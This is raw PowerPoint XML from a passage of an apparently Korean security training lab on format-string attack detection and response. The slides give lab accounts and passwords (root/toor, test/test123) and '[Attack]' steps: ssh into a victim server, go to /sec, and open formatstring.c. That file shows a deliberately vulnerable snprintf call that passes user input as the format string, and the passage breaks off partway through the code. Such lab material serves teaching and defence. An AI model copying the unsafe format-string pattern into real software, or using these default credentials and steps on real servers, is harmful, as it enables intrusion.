        <p:nvSpPr>
          <p:cNvPr id="12"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15" name="직사각형 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D8D3A92-0A46-4186-A771-BEFC29C6D972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1685754" y="4105344"/>
            <a:ext cx="2880320" cy="383823"/>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kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>account/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: root / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>toor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="직사각형 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1A6365-9085-49EC-9100-C390DB4D7CDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7896200" y="3868419"/>
            <a:ext cx="3024336" cy="857671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>account/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: root / root123 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>account/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: test / test123</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="순서도: 병합 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6E07DFB-2D13-4AF3-B90C-56D0F1E02814}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1798558">
            <a:off x="10059259" y="1288983"/>
            <a:ext cx="736741" cy="707116"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMerge">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B01513">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순서도: 병합 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6E07DFB-2D13-4AF3-B90C-56D0F1E02814}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1798558">
            <a:off x="7512494" y="5708166"/>
            <a:ext cx="688666" cy="459869"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMerge">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B01513">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813116"/>
            <a:ext cx="5754484" cy="857671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="just" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Attack]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Connect to the victim server using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> test @ [Victim server IP] (password: test123)  </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="직선 연결선 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6E846F0-4EA1-4161-9A2A-727CB13AEB31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240016" y="813116"/>
            <a:ext cx="0" cy="4272068"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42107B91-8325-4884-A480-F3CF235AA0A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991544" y="5407213"/>
            <a:ext cx="9144000"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sz="1400" kern="0" dirty="0"/>
              <a:t>The first step of LAB is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>initiated by attacker in Attacker Server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>You, as an attacker, connect to the victim server using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="0" dirty="0"/>
              <a:t>with account test.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="shape1401"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="565494" y="2276872"/>
            <a:ext cx="5403215" cy="1932940"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188318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923407"/>
            <a:ext cx="5472608" cy="410882"/>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Attack]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Go to the / sec directory</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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부제목 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A05FE0C-E396-4533-B6CD-258F77786A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991544" y="5407213"/>
            <a:ext cx="9144000"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sz="1400" kern="0" dirty="0"/>
              <a:t>Then, go to the /sec directory.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1400" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1916832"/>
            <a:ext cx="1367682" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>$ cd / sec </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111975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2D8D3A92-0A46-4186-A771-BEFC29C6D972}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389860" y="923407"/>
            <a:ext cx="5472608" cy="729430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[Attack]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check the vulnerable code of the source file (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>formatstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" kern="100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="직선 연결선 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B532798-8D7D-432E-B271-C640276DECCD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6240016" y="813116"/>
            <a:ext cx="0" cy="39840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제목 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BCE533C-1559-4D06-A824-31DB14FD4A5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="47270"/>
            <a:ext cx="12288688" cy="91440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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>#81. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>FormatString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> Attack Detection and Response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Solutions</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389860" y="1713936"/>
            <a:ext cx="5418108" cy="4832092"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>$ vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>formatstring.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>#include "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>RootPW.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> main (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>, char * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> []) { </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> pass = 0; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     char buff [512]; </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> &lt;2) {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> ( "Failed: Usage [% s password] \ n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> [0]); return 1; } </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> (buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> (buff), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
